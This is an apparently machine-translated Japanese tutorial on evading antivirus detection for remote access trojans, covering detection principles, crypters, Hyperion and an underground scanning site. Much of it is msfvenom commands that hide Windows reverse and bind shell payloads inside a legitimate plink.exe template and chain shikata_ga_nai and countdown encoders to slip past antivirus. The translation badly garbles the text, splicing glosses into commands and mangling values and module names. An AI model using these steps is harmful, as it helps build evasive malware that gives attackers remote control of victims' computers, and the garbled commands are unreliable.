RAT回避殺害技術

RAT

RATマインドマップのダウンロードリンク

検出原理

バイナリ署名のブラックリストベースの検出方法

分析方法（ヒューリスティック）動作ベース

避け殺害技術

これは、文字がバイナリファイルを修正しています

• 消去、変更、交換してください

暗号化技術（crypter）

• 暗号化により、判読できない文字ことを特徴とするので、そのAVエスケープ検出
• 時間実行無害なファイル復号チップセグメント、またはAV注入プロセスを実行することでチェックしません

アンチウイルスソフトウェアの検出

• 特長文字悪意のあるプログラム自体
• 前記文字スクランブラcrypter

AVとの共有情報へのオンラインマルチエンジンのウイルス対策ベンダーのサイト

https://www.virustotal.com/gui/home/upload

http://www.virscan.org/

黒オンラインマルチエンジンウイルススキャンステーションに従事する

https://nodistribute.com/

ソフトウェアの保護

著作権の保護、混乱や著作権侵害を避けるために、逆に使用される暗号化技術のためのソフトウェア開発者

不正なソフトウェアは、多くの場合、目的のために殺すことは自由です

ハイペリオン（32ビットプログラムスクランブラ）

• Crypter（暗号化）
• 容器（デスクランブラ+ PEローダ）

テンプレートを使用して（通常の手順）を隠すシェル

#msfvenom -p（負荷）は、Windows / shell_reverse_tcp -x（テンプレートを使用）/usr/share/windows-binaries/plink.exe lhost = 1.1.1.1 lportは= 4.4.4.4 -a（オペレーティング・システム・アーキテクチャ）のx86 --platform（プラットフォーム）勝利（窓）-f（出力形式）exeファイル-o（出力）A.EXE

#msfvenom -p（加载） windows/shell/bind_tcp -x （模板） /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shaikata_ga_nai -i 5 -a x86 --platform win -f exe > b.exe

#strinsはA.EXE（不審なプログラムに読み込み可能な文字列の内容を参照してください）

＃md5sumは* .exeの（プログラムの値を参照してください）

リバウンドシェルをコーディング暗号化

#msfvenom -p窓/シェル/ bind_tcp lhost = 1.1.1.1 lportは= 4444 -f（形式）RAW（生フォーマット）-e（暗号化）のx86 / shikata_ga_nai（暗号化モジュール）-i（暗号化回）5（5）

|（パイプ）msfvenom -a（アーキテクチャ）のx86 --platform（プラットフォーム）ウィンドウが-e（暗号化）のx86 /カウントダウン（モジュール）-i（暗号化された数）8（番号）-f（出力形式）生（RAW形式）

|（パイプ）msfvenom -a（アーキテクチャ）のx86 --platform（プラットフォーム）のウィンドウは '\ X00' -f（（暗号化）のx86 / shikata_ga_nai（モジュール）-i（暗号化された数）9 -b（フィルタの特殊文字を）-e出力形式）EXE -o（出力）-a.exeでした

リバウンドシェルを生成します

#msfvenom -p（ペイロード）窓/シェル/ bind_tcp lhost（他のIP）= 1.1.1.1 lportは（他のポート）= 4444 -a（オペレーティング・システム・アーキテクチャ）のx86 --platform（プラットフォーム）勝利（Windowsプラットフォーム）-f（出力形式）EXE -o（出力）-a.exeでした